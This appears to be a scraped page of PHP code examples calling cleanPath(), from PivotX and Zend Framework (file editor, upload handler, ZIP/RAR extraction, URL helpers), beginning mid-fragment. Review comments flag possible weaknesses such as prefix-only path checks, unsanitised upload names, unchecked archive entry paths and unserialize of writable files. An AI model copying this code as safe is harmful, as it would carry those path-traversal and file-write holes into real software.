// NOTE(review): $path above is built from cleanPath($file), while this
// directory (used below to look for .htpasswd) is built from the raw $file.
// If cleanPath() changes the value, the password lookup may inspect a
// different directory than the one the file is served from; derive both from
// the same cleaned value.
$temp = $config['uploads_path'] . DIRECTORY_SEPARATOR . implode('/', $temp) . DIRECTORY_SEPARATOR;
// Check password
if (is_file($temp . '.htpasswd')) {
    $check = substr(phpversion(), 0, 3) < 4.3 ? substr(implode('', file($temp . '.htpasswd')), 9) : substr(file_get_contents($temp . '.htpasswd'), 9);
    if (crypt($pw, $check) != $check) {
Exemplo n.º 18
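 /**
  * Show / Edit a file in the ajaxy editor.
  *
  * Requires administrator level. The directory arrives base64-encoded in
  * $_GET['basedir'] and the file name in $_GET['file']; both are
  * client-supplied. Serialized files are shown as a read-only dump, anything
  * else is loaded into the editor form.
  *
  * NOTE(review): the home_path tests are plain string-prefix comparisons. They
  * only confine access if cleanPath() resolves '..' segments and home_path
  * ends with a separator; confirm both.
  * NOTE(review): loadSerialize() is defined elsewhere. If it unserializes the
  * file contents, every file an attacker can write below home_path is
  * untrusted input to it.
  *
  * @return void Output is written directly
  */
 public static function ext_view()
 {
     global $PIVOTX;
     $PIVOTX['session']->minLevel(PIVOTX_UL_ADMIN);
     // TODO: Check if the file is writable before showing the editor.
     if (empty($_GET['basedir'])) {
         die('Basedir is empty.');
     }
     $basedir = cleanPath(base64_decode($_GET['basedir']));
     $requestedFile = isset($_GET['file']) ? $_GET['file'] : '';
     // Don't allow opening files outside $PIVOTX['paths']['home_path'].
     // This is consistent with the file explorer functions in pages.php.
     if (strpos($basedir, $PIVOTX['paths']['home_path']) !== 0) {
         die('Basedir outside home_path. Hacking attempt?');
     }
     $filename = cleanPath($basedir . $requestedFile);
     // The file name is client-supplied as well, so the combined path is
     // checked again after cleaning, not only the directory.
     if (strpos($filename, $PIVOTX['paths']['home_path']) !== 0) {
         die('File outside home_path. Hacking attempt?');
     }
     if ($contents = loadSerialize($filename)) {
         // Get the output in a buffer..
         ob_start();
         print_r($contents);
         $contents = ob_get_contents();
         ob_end_clean();
         echo "<pre>\n";
         echo htmlentities($contents, ENT_QUOTES, "UTF-8");
         echo "</pre>\n";
     } else {
         $extension = getExtension($filename);
         $contents = implode("", file($filename));
         // keep a literal textarea tag in the file from closing the editor field
         $contents = preg_replace('/<textarea/i', '<*textarea', $contents);
         $contents = preg_replace('/<\\/textarea/i', '<*/textarea', $contents);
         echo "<form id='editor' class='formclass' method='post' action='' style='border: 0px;'>";
         // Request values are escaped before being reflected into the attribute
         // values; written raw, a quote in either parameter would break out of
         // the attribute and inject markup into the administrator's page.
         echo "<input type='hidden' value='" . htmlspecialchars($_GET['basedir'], ENT_QUOTES, 'UTF-8') . "' id='editBasedir'>";
         echo "<input type='hidden' value='" . htmlspecialchars($requestedFile, ENT_QUOTES, 'UTF-8') . "' id='editFile'>";
         echo "<textarea style='width: 759px; border: 1px inset #999; height: 380px;' id='editContents' name='editContents' class='Editor' >";
         echo htmlentities($contents, ENT_QUOTES, 'UTF-8');
         echo "</textarea>";
         if (in_array($extension, array('html', 'htm', 'tpl', 'xml', 'css'))) {
             echo '<script language="javascript" type="text/javascript">' . "\n";
             echo 'jQuery(function($) {' . "\n";
             echo '  $("#editContents").markItUp(markituphtml);' . "\n";
             echo '});' . "\n";
             echo '</script>' . "\n";
         } else {
             echo '<script language="javascript" type="text/javascript">' . "\n";
             echo 'jQuery(function($) {' . "\n";
             echo '  $("#editContents").css("height", "384px");' . "\n";
             echo '});' . "\n";
             echo '</script>' . "\n";
         }
         printf('<p class="buttons" style="margin: 0 0 6px 0; clear: both;"><a href="#" onclick="saveEdit();"><img src="pics/accept.png" alt="" />%s</a>', __('Save'));
         printf('<a href="#" onclick="saveEditAndContinue();"><img src="pics/accept.png" alt="" />%s</a>', __('Save and continue editing'));
         printf('<a href="#" onclick="closeEdit();" class="negative" style="margin-left: 20px;"><img src="pics/delete.png" alt="" />%s</a></p>', __('Cancel'));
         if ($PIVOTX['config']->get('smarty_cache') || $PIVOTX['config']->get('minify_frontend')) {
             $msg = __("You have Caching and/or Minify enabled. If your changes do not show up immediately, %click here% and disable Caching and Minify while you're working on your site.");
             $msg = preg_replace('/%(.*)%/i', "<a href='index.php?page=configuration#section-1'>\\1</a>", $msg);
             echo "\n\n<p class='small' style='width: 500px;clear: both;'>" . $msg . "</p>\n";
         }
         echo "</form>";
     }
 }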
Exemplo n.º 19
/**
 * Tell whether a path may be written to.
 *
 * The only test made is a traversal guard: a cleaned path that begins with
 * one more '../' than $GLOBALS['ftp_prepath'] has '/' characters is refused.
 * Everything else is reported as writable; no permission bits are read.
 *
 * @param string $source Path to test
 * @return bool FALSE for a path that climbs above the prepath, TRUE otherwise
 */
function fm_iswritable($source)
{
    // number of '../' steps that would leave the configured prepath
    $escapeDepth = 1 + substr_count($GLOBALS['ftp_prepath'], '/');
    $escapePrefix = str_repeat('../', $escapeDepth);
    return !startsWith(cleanPath($source), $escapePrefix);
}
Exemplo n.º 20
 /**
  * Locate the 'Zend' directory on the include_path.
  *
  * Entries that do not exist or that start with '.' are skipped. The first
  * remaining entry that contains Zend/Loader.php wins.
  *
  * @return string|false Directory holding Zend/Loader.php, FALSE when none is found
  */
 protected function _getZfPath()
 {
     require_once PHP_LIBRARY_PATH . 'Zend/Loader.php';
     foreach (Zend_Loader::explodeIncludePath() as $includePath) {
         if (file_exists($includePath) && $includePath[0] != '.') {
             $checkedPath = rtrim($includePath, '\\/') . '/Zend/Loader.php';
             // the candidate has to pass cleanPath() and exist on disk
             if (cleanPath($checkedPath) === false) {
                 continue;
             }
             if (file_exists($checkedPath)) {
                 return dirname($checkedPath);
             }
         }
     }
     return false;
 }
Exemplo n.º 21
/**
 * Extract the href targets from a piece of markup as full URLs.
 *
 * Targets that do not start with http:// or https:// are treated as relative
 * and prefixed with getPath($url). Every result is passed through cleanPath().
 *
 * NOTE(review): scheme-relative links ("//host/...") and other schemes are
 * handled as relative paths too; filter the result before fetching or linking
 * if $string comes from an untrusted page.
 *
 * @param string $url    URL the markup was loaded from
 * @param string $string Markup to scan
 * @return array Array with one key, 'href', holding the list of URLs
 */
function getUrls($url, $string)
{
    $type = "href";
    # Regex to chop out urls
    preg_match_all("|{$type}\\=\"?'?`?([[:alnum:]:?=&@/._-]+)\"?'?`?|i", $string, $matches);
    $ret[$type] = $matches[1];
    # Make all URLS literal (full path)
    foreach ($ret['href'] as $i => $link) {
        $isAbsolute = preg_match('/^(http|https):\\/\\//i', $link);
        if (!$isAbsolute) {
            $link = getPath($url) . "/" . $link;
        }
        $ret['href'][$i] = cleanPath($link);
    }
    return $ret;
}
Exemplo n.º 22
/**
 * rawurlencode() a file's path but keep the slashes.
 *
 * The input is decoded first, so a path that is already encoded is not
 * encoded twice, then cleaned with cleanPath() and encoded again.
 *
 * @param string $path Raw or already URL-encoded path
 * @return string Encoded path with literal '/' separators
 */
function urlPath($path)
{
    // decode -> clean -> encode, then turn the encoded slashes back into '/'
    return str_replace('%2F', '/', rawurlencode(cleanPath(rawurldecode($path))));
}
Exemplo n.º 23
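 /**
  * Find cleanPath of file based on include_path
  *
  * Each include_path entry is tried in order; the first one for which
  * cleanPath() does not return FALSE is used.
  *
  * @param  string $fileName
  * @return string|false Resolved path, FALSE when no include_path entry matches
  */
 public static function findcleanPathInIncludePath($fileName)
 {
     require_once PHP_LIBRARY_PATH . 'Zend/Loader.php';
     foreach (Zend_Loader::explodeIncludePath() as $includePath) {
         $resolved = cleanPath($includePath . DIRECTORY_SEPARATOR . $fileName);
         if ($resolved !== false) {
             return $resolved;
         }
     }
     // Also reached when the include_path is empty, in which case the result
     // variable was previously never assigned.
     return false;
 }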
Exemplo n.º 24
// Remove old files
$maxFileAge = 60 * 60;
// Temp file age in seconds
// NOTE(review): $_GET['type'] is read without isset(). For any other value the
// switch assigns nothing, so $targetDir is only defined if the 'path' branch
// below runs.
switch ($_GET['type']) {
    case 'image':
    case 'images':
    case 'file':
    case 'files':
        $targetDir = makeUploadFolder();
        $cleanupTargetDir = false;
        break;
}
// An explicit target path overrides the default upload folder. It is accepted
// only for sessions at PIVOTX_UL_ADVANCED or above and only when
// uploadAllowed() approves the cleaned path.
if (isset($_GET['path']) && $_GET['path'] != '') {
    /* Using same user level as in fileOperations (in lib.php) */
    $PIVOTX['session']->minLevel(PIVOTX_UL_ADVANCED);
    $path = cleanPath($_GET['path']);
    // Don't ever allow uploading outside the images, templates and db folders.
    if (!uploadAllowed($path)) {
        die('{"jsonrpc" : "2.0", "error" : {"code": 104, "message": "Uploading to illegal directory."}, "id" : "id"}');
    }
    $targetDir = stripTrailingSlash($path);
    $cleanupTargetDir = false;
}
// 5 minutes execution time
@set_time_limit(5 * 60);
// usleep(5000);
// Get parameters
// NOTE(review): chunk, chunks and name are taken from the request unchanged:
// the counters are not cast to integers and the file name is not sanitised in
// this excerpt. Confirm that the code that follows restricts the name to a
// bare file name with an allowed extension before writing below $targetDir.
$chunk = isset($_REQUEST["chunk"]) ? $_REQUEST["chunk"] : 0;
$chunks = isset($_REQUEST["chunks"]) ? $_REQUEST["chunks"] : 0;
$fileName = isset($_REQUEST["name"]) ? $_REQUEST["name"] : '';
if ($fileName == '' && isset($_FILES['file']['name'])) {
Exemplo n.º 25
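 /**
  * fromReflectedFileName() - use this if you intend on generating code generation objects based on the same file.
  * This will keep previous changes to the file intact during the same PHP process.
  *
  * The path is resolved with cleanPath() and, if that fails, looked up on the
  * include_path. Generators are cached per resolved file name in
  * self::$_fileCodeGenerators.
  *
  * NOTE(review): with $includeIfNotAlreadyIncluded = true the resolved file is
  * include()d, i.e. executed. $filePath must come from trusted code, never from
  * request data.
  *
  * @param string $filePath
  * @param bool $usePreviousCodeGeneratorIfItExists
  * @param bool $includeIfNotAlreadyIncluded
  * @return Zend_CodeGenerator_Php_File
  * @throws Zend_CodeGenerator_Php_Exception when the file cannot be located
  */
 public static function fromReflectedFileName($filePath, $usePreviousCodeGeneratorIfItExists = true, $includeIfNotAlreadyIncluded = true)
 {
     $cleanPath = cleanPath($filePath);
     if ($cleanPath === false) {
         // Same class as the Zend_Reflection_File used below; spelled consistently.
         $cleanPath = Zend_Reflection_File::findcleanPathInIncludePath($filePath);
     }
     // Anything that is false or null at this point means "not found".
     if ($cleanPath === false || $cleanPath === null) {
         require_once PHP_LIBRARY_PATH . 'Zend/CodeGenerator/Php/Exception.php';
         // Report the requested name: $cleanPath holds no path here and would
         // print as an empty string.
         throw new Zend_CodeGenerator_Php_Exception('No file for ' . $filePath . ' was found.');
     }
     if ($usePreviousCodeGeneratorIfItExists && isset(self::$_fileCodeGenerators[$cleanPath])) {
         return self::$_fileCodeGenerators[$cleanPath];
     }
     // Both sides are strings, so compare strictly.
     if ($includeIfNotAlreadyIncluded && !in_array($cleanPath, get_included_files(), true)) {
         include $cleanPath;
     }
     $fileReflector = new Zend_Reflection_File($cleanPath);
     $codeGenerator = self::fromReflection($fileReflector);
     // Cache under the name the reflector reports, without replacing an existing entry.
     $reflectedName = $fileReflector->getFileName();
     if (!isset(self::$_fileCodeGenerators[$reflectedName])) {
         self::$_fileCodeGenerators[$reflectedName] = $codeGenerator;
     }
     return $codeGenerator;
 }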
Exemplo n.º 26
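 /**
  * Constructor: fills the credential object from $options and resolves the
  * local WSDL file.
  *
  * Recognised option keys (first letter upper-cased via ucfirst() before
  * matching): Username, Password, Realm, Environment. Other keys are ignored.
  *
  * @param array $options Associative array of options
  * @throws Zend_Service_DeveloperGarden_Exception when _wsdlFile is empty, or
  *         when _wsdlFileLocal is empty or cleanPath() returns false for it
  */
 public function __construct(array $options = array())
 {
     $this->_credential = new Zend_Service_DeveloperGarden_Credential();
     // foreach instead of list()/each(): each() is deprecated since PHP 7.2 and
     // removed in PHP 8.0.
     foreach ($options as $name => $value) {
         switch (ucfirst($name)) {
             case 'Username':
                 $this->_credential->setUsername($value);
                 break;
             case 'Password':
                 $this->_credential->setPassword($value);
                 break;
             case 'Realm':
                 $this->_credential->setRealm($value);
                 break;
             case 'Environment':
                 $this->setEnvironment($value);
                 break;
         }
     }
     if (empty($this->_wsdlFile)) {
         require_once PHP_LIBRARY_PATH . 'Zend/Service/DeveloperGarden/Exception.php';
         throw new Zend_Service_DeveloperGarden_Exception('_wsdlFile not set for this service.');
     }
     if (!empty($this->_wsdlFileLocal)) {
         // Resolve the local WSDL relative to the parent of this file's directory.
         $this->_wsdlFileLocal = cleanPath(dirname(__FILE__) . '/../' . $this->_wsdlFileLocal);
     }
     // Covers both "never configured" and "configured but cleanPath() returned false".
     if (empty($this->_wsdlFileLocal) || $this->_wsdlFileLocal === false) {
         require_once PHP_LIBRARY_PATH . 'Zend/Service/DeveloperGarden/Exception.php';
         throw new Zend_Service_DeveloperGarden_Exception('_wsdlFileLocal not set for this service.');
     }
 }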
Exemplo n.º 27
Arquivo: Rar.php Projeto: netixx/Stock
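 /**
  * Decompresses the given content
  *
  * If $content names an existing file it is used as the archive; otherwise the
  * archive configured on this filter is used. Every entry is extracted into the
  * configured target, or into its parent directory when the target is not a
  * directory.
  *
  * NOTE(review): entry names come from the archive itself and the result of
  * each extract() call is not checked. Confirm how the rar extension treats
  * entries with '..' or absolute paths before using this filter on archives
  * from untrusted sources.
  *
  * @param  string $content Path to a RAR archive, or any other value to fall
  *                         back to the configured archive
  * @return boolean Always true; failures are reported by exception
  * @throws Zend_Filter_Exception when the archive is missing, cannot be opened
  *         or cannot be listed
  */
 public function decompress($content)
 {
     $archivePath = $this->getArchive();
     if (file_exists($content)) {
         $archivePath = str_replace(array('/', '\\'), DIRECTORY_SEPARATOR, cleanPath($content));
     } elseif (empty($archivePath) || !file_exists($archivePath)) {
         require_once PHP_LIBRARY_PATH . 'Zend/Filter/Exception.php';
         throw new Zend_Filter_Exception('RAR Archive not found');
     }
     $password = $this->getPassword();
     if ($password !== null) {
         $archive = rar_open($archivePath, $password);
     } else {
         $archive = rar_open($archivePath);
     }
     if (!$archive) {
         require_once PHP_LIBRARY_PATH . 'Zend/Filter/Exception.php';
         throw new Zend_Filter_Exception("Error opening the RAR Archive");
     }
     $target = $this->getTarget();
     if (!is_dir($target)) {
         $target = dirname($target);
     }
     $filelist = rar_list($archive);
     if (!$filelist) {
         // Release the handle before bailing out; it used to stay open on this path.
         rar_close($archive);
         require_once PHP_LIBRARY_PATH . 'Zend/Filter/Exception.php';
         throw new Zend_Filter_Exception("Error reading the RAR Archive");
     }
     foreach ($filelist as $file) {
         $file->extract($target);
     }
     rar_close($archive);
     return true;
 }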
Exemplo n.º 28
/**
 * Finds a path to a target file, checking the filename and each directory
 * name in the path case-insensitively. If a target file is found, returns
 * the path with the correct, existing casing. Otherwise, returns false.
 * Optionally searches for files with the same name but alternative
 * extensions (defaults to true). Optionally searches for only files
 * ($findDir = 0), files and directories ($findDir = 1), or only
 * directories ($findDir = 2)
 *
 * The path is used as given: nothing in this function restricts it to a base
 * directory, so a caller handling request-supplied names has to confine them
 * itself before calling.
 *
 * @param string $path The file to search for.
 * @param bool $findAltExt Set false for strict extension checking.
 * @param int  $findDir Set 0 to only return paths to actual files,
 *                      Set 1 to return paths to both files and directories
 *                      Set 2 to only return paths to directories
 * @return string|bool The existing path, or false when nothing matches
 */
function fileExists($path, $findAltExt = true, $findDir = 1)
{
    // This function is expecting valid path names.
    // So, if you need to trim or remove bad characters,
    // do that before sending them to this function
    // guard against bad input (such as a null path)
    $findDir = (int) $findDir;
    // 0: no, 1: yes, 2: only
    $path = (string) $path;
    if ($path === '') {
        return false;
    }
    // efficiency checks: an exact hit on the path as given (before cleanPath())
    // is returned directly when its kind matches $findDir
    if (is_file($path)) {
        if ($findDir < 2) {
            return $path;
        } elseif (!$findAltExt) {
            // directories only, and no alternative extensions to try
            return false;
        }
    }
    if (is_dir($path)) {
        if ($findDir > 0) {
            return $path;
        } elseif (!$findAltExt) {
            // files only, and no alternative extensions to try
            return false;
        }
    }
    // -convert Windows directory separators '\' to standard '/'
    // -remove unneeded path elements, such as '.' or 'dir/../'
    // -remove trailing slash
    // -trim each component
    // -this is so we can explode by '/' and correctly identify
    //  each path components (e.g., 'one' and 'two' from 'one\two')
    // (the list above is what this code expects of cleanPath(), which is defined elsewhere)
    $path = cleanPath($path);
    $path = explode('/', $path);
    // if they only supplied a single component, there is the unlikely
    // case that they are searching for the root directory
    // Let's check for that, before assuming that they are looking for
    // a file or directory in the current working directory
    if (count($path) === 1) {
        $absDir = convertAbsoluteDir($path[0]);
        if ($absDir !== false) {
            // in this case, we have an absolute path of a root directory
            if ($findDir === 0) {
                return false;
            } else {
                // this will give them the actual root directory for this OS
                return $absDir;
            }
        } else {
            // in this case, just try to find a relative target
            return find_in_dir('.', $path[0], $findAltExt, $findDir);
        }
    }
    // we are going to search for the final component a bit differently,
    // since it can be either a directory or a file, so lets pull that off
    $finalComponent = array_pop($path);
    // now we need to find the directory portion of the path
    // if is_dir() cannot find it, then we will start pulling off
    // components from the end of the path until we get a directory
    // we can locate
    $dirsNotFound = array();
    while (!is_dir(implode('/', $path))) {
        // for the first dir, check if its an absolute or relative dir
        if (count($path) === 1) {
            $absDir = convertAbsoluteDir($path[0]);
            if ($absDir !== false) {
                // if absolute, set the starting path to the actual root
                $path = array($absDir);
            } else {
                $dirsNotFound[] = array_pop($path);
            }
            break;
            // checking first dir, can't go back any more
        } else {
            // move last dir in $path to the end of $dirsNotFound
            // (the list is reversed after the loop)
            $dirsNotFound[] = array_pop($path);
        }
    }
    $dirsNotFound = array_reverse($dirsNotFound);
    // correct order of dirs
    // if $path is empty, not even the first dir could be identified
    // so, we will assume its a relative path
    // otherwise, we are going to use what we could
    if ($path === array()) {
        $baseDir = '.';
    } else {
        $baseDir = implode('/', $path);
    }
    // now lets do a case-insensitive search for the rest of the dirs
    foreach ($dirsNotFound as $targetDir) {
        // use find_in_dir, but only search for dirs
        $search = find_in_dir($baseDir, $targetDir, false, 2);
        if ($search === false) {
            return false;
        }
        $baseDir .= '/' . $search;
    }
    // Huzzah! At this point, we should have found our directory,
    // and we just need to search for the final component
    $finalSearch = find_in_dir($baseDir, $finalComponent, $findAltExt, $findDir);
    if ($finalSearch === false) {
        return false;
    } else {
        $existingPath = $baseDir . '/' . $finalSearch;
        // drop the './' prefix added when the search started from the current directory
        if (substr($existingPath, 0, 2) === './') {
            $existingPath = substr($existingPath, 2);
        }
        return $existingPath;
    }
}
Exemplo n.º 29
Arquivo: Zip.php Projeto: netixx/Stock
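 /**
  * Decompresses the given content
  *
  * If $content names an existing file it is used as the archive; otherwise the
  * archive configured on this filter is used. The whole archive is extracted
  * into the configured target, or into its parent directory when the target is
  * not a directory.
  *
  * On PHP 5.2.8 and later this method relies on the zip extension's own path
  * resolution in extractTo(). The explicit traversal check below runs only on
  * older versions and only inspects the start of each entry name, so it does
  * not catch a '..' segment deeper inside a name.
  *
  * @param  string $content Path to a ZIP archive, or any other value to fall
  *                         back to the configured archive
  * @return string The target directory, with a trailing directory separator
  * @throws Zend_Filter_Exception when the archive or target is missing, the
  *         archive cannot be opened, or extraction fails
  */
 public function decompress($content)
 {
     $archive = $this->getArchive();
     if (file_exists($content)) {
         $archive = str_replace(array('/', '\\'), DIRECTORY_SEPARATOR, cleanPath($content));
     } elseif (empty($archive) || !file_exists($archive)) {
         require_once PHP_LIBRARY_PATH . 'Zend/Filter/Exception.php';
         throw new Zend_Filter_Exception('ZIP Archive not found');
     }
     $zip = new ZipArchive();
     $res = $zip->open($archive);
     // Remember whether there is a handle to release on the error paths below.
     $opened = $res === true;
     $target = $this->getTarget();
     if (!empty($target) && !is_dir($target)) {
         $target = dirname($target);
     }
     if (!empty($target)) {
         $target = rtrim($target, '/\\') . DIRECTORY_SEPARATOR;
     }
     if (empty($target) || !is_dir($target)) {
         if ($opened) {
             $zip->close();
         }
         require_once PHP_LIBRARY_PATH . 'Zend/Filter/Exception.php';
         throw new Zend_Filter_Exception('No target for ZIP decompression set');
     }
     if (!$opened) {
         require_once PHP_LIBRARY_PATH . 'Zend/Filter/Exception.php';
         throw new Zend_Filter_Exception($this->_errorString($res));
     }
     if (version_compare(PHP_VERSION, '5.2.8', '<')) {
         for ($i = 0; $i < $zip->numFiles; $i++) {
             $statIndex = $zip->statIndex($i);
             $currName = $statIndex['name'];
             // substr() instead of $currName[0] so an empty entry name raises no notice.
             if (substr($currName, 0, 1) == '/' || substr($currName, 0, 2) == '..' || substr($currName, 0, 4) == './..') {
                 $zip->close();
                 require_once PHP_LIBRARY_PATH . 'Zend/Filter/Exception.php';
                 throw new Zend_Filter_Exception('Upward directory traversal was detected inside ' . $archive . ' please use PHP 5.2.8 or greater to take advantage of path resolution features of ' . 'the zip extension in this decompress() method.');
             }
         }
     }
     // Warnings stay suppressed as before; failure is reported through the exception.
     $res = @$zip->extractTo($target);
     if ($res !== true) {
         // Release the handle on failure too; it used to stay open on this path.
         $zip->close();
         require_once PHP_LIBRARY_PATH . 'Zend/Filter/Exception.php';
         throw new Zend_Filter_Exception($this->_errorString($res));
     }
     $zip->close();
     return $target;
 }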
Exemplo n.º 30
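/**
 * Percent-encode (or decode) the query values and path segments of a URL and
 * rebuild the URL from its parts.
 *
 * An empty $url is returned unchanged. A URL that parse_url() cannot parse
 * yields '' (unchanged from the previous behaviour). Only query items of the
 * exact form "key=value" are kept; items without '=' or with more than one '='
 * are dropped. The path is passed through cleanPath() (defined elsewhere) when
 * the URL is rebuilt.
 *
 * NOTE(review): with $encode != 1 the result holds decoded data; treat it as
 * untrusted input again before using it in a file path, a redirect or markup.
 *
 * @param string $url    URL to process
 * @param int    $encode 1 to rawurlencode(), anything else to rawurldecode()
 * @return string
 */
function myUrlcode($url, $encode = 1)
{
    // Make sure we have a string to work with
    if (empty($url)) {
        return $url;
    }
    $urllist = parse_url($url);
    if (!is_array($urllist)) {
        // Malformed URL: no parts to rebuild from.
        return "";
    }
    // Loose comparison kept so that '1' and true still select encoding.
    $doEncode = $encode == 1;
    if (isset($urllist["query"])) {
        $pairs = array();
        foreach (explode("&", $urllist["query"]) as $pair) {
            $keyvalue = explode("=", $pair);
            // Only plain "key=value" items are carried over.
            if (count($keyvalue) == 2) {
                $keyvalue[1] = $doEncode ? rawurlencode($keyvalue[1]) : rawurldecode($keyvalue[1]);
                $pairs[] = implode("=", $keyvalue);
            }
        }
        $urllist["query"] = implode("&", $pairs);
    }
    if (isset($urllist["path"])) {
        $segments = array();
        // Convert each segment on its own so the '/' separators stay literal.
        foreach (explode("/", $urllist["path"]) as $segment) {
            $segments[] = $doEncode ? rawurlencode($segment) : rawurldecode($segment);
        }
        $urllist["path"] = implode("/", $segments);
    }
    // userinfo is "user@" or "user:pass@". The '@' used to be added only together
    // with a password, which turned "user@host" into "user:host".
    $userinfo = "";
    if (isset($urllist["user"]) || isset($urllist["pass"])) {
        $userinfo = (isset($urllist["user"]) ? $urllist["user"] : "")
            . (isset($urllist["pass"]) ? ":" . $urllist["pass"] : "")
            . "@";
    }
    return (isset($urllist["scheme"]) ? $urllist["scheme"] . "://" : "")
        . $userinfo
        . (isset($urllist["host"]) ? $urllist["host"] : "")
        . (isset($urllist["port"]) ? ":" . $urllist["port"] : "")
        . (isset($urllist["path"]) ? cleanPath($urllist["path"]) : "")
        . (isset($urllist["query"]) ? "?" . $urllist["query"] : "")
        . (isset($urllist["fragment"]) ? "#" . $urllist["fragment"] : "");
}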